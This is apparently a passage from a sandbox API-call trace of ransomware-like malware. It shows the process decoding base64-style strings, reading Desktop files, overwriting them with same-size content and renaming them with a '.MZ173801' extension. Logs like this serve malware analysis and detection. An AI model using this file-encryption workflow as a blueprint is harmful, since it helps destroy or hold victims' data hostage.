lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.250] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.250] GetCurrentThreadId () returned 0x1358 [0123.250] GetCurrentThreadId () returned 0x1358 [0123.250] GetCurrentThreadId () returned 0x1358 [0123.251] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.251] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.251] GetCurrentThreadId () returned 0x1358 [0123.251] GetCurrentThreadId () returned 0x1358 [0123.251] GetCurrentThreadId () returned 0x1358 [0123.251] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\qgnj.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\qgnj.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.251] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.251] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.251] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x14fce [0123.251] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.251] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x14fce, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x14fce, lpOverlapped=0x0) returned 1 [0123.253] CloseHandle (hObject=0x410) returned 1 [0123.254] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\qgnj.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\qgnj.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.255] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x14fce, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x14fce, lpOverlapped=0x0) returned 1 [0123.309] CloseHandle (hObject=0x410) returned 1 [0123.309] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\qgnj.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\qgnj.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\qgnj.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\qgnj.wav.mz173801")) returned 1 [0123.309] GetCurrentThreadId () returned 0x1358 [0123.309] GetCurrentThreadId () returned 0x1358 [0123.310] GetCurrentThreadId () returned 0x1358 [0123.310] GetCurrentThreadId () returned 0x1358 [0123.310] GetCurrentThreadId () returned 0x1358 [0123.310] GetCurrentThreadId () returned 0x1358 [0123.310] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7f527a0, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0xbee91ea0, ftLastAccessTime.dwHighDateTime=0x1d5ef18, ftLastWriteTime.dwLowDateTime=0xbee91ea0, ftLastWriteTime.dwHighDateTime=0x1d5ef18, nFileSizeHigh=0x0, nFileSizeLow=0x14267, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="qMCV4VrTY-vx5.avi", cAlternateFileName="QMCV4V~1.AVI")) returned 1 [0123.310] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.310] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.310] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\qMCV4VrTY-vx5.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\qmcv4vrty-vx5.avi"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7f527a0, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0xbee91ea0, ftLastAccessTime.dwHighDateTime=0x1d5ef18, ftLastWriteTime.dwLowDateTime=0xbee91ea0, ftLastWriteTime.dwHighDateTime=0x1d5ef18, nFileSizeHigh=0x0, nFileSizeLow=0x14267)) returned 1 [0123.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.310] GetCurrentThreadId () returned 0x1358 [0123.310] GetCurrentThreadId () returned 0x1358 [0123.311] GetCurrentThreadId () returned 0x1358 [0123.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.311] GetCurrentThreadId () returned 0x1358 [0123.311] GetCurrentThreadId () returned 0x1358 [0123.311] GetCurrentThreadId () returned 0x1358 [0123.311] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\qMCV4VrTY-vx5.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\qmcv4vrty-vx5.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.311] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.311] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.312] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x14267 [0123.312] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.312] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x14267, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x14267, lpOverlapped=0x0) returned 1 [0123.313] CloseHandle (hObject=0x410) returned 1 [0123.314] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\qMCV4VrTY-vx5.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\qmcv4vrty-vx5.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.315] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x14267, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x14267, lpOverlapped=0x0) returned 1 [0123.318] CloseHandle (hObject=0x410) returned 1 [0123.318] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\qMCV4VrTY-vx5.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\qmcv4vrty-vx5.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\qMCV4VrTY-vx5.avi.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\qmcv4vrty-vx5.avi.mz173801")) returned 1 [0123.318] GetCurrentThreadId () returned 0x1358 [0123.318] GetCurrentThreadId () returned 0x1358 [0123.318] GetCurrentThreadId () returned 0x1358 [0123.318] 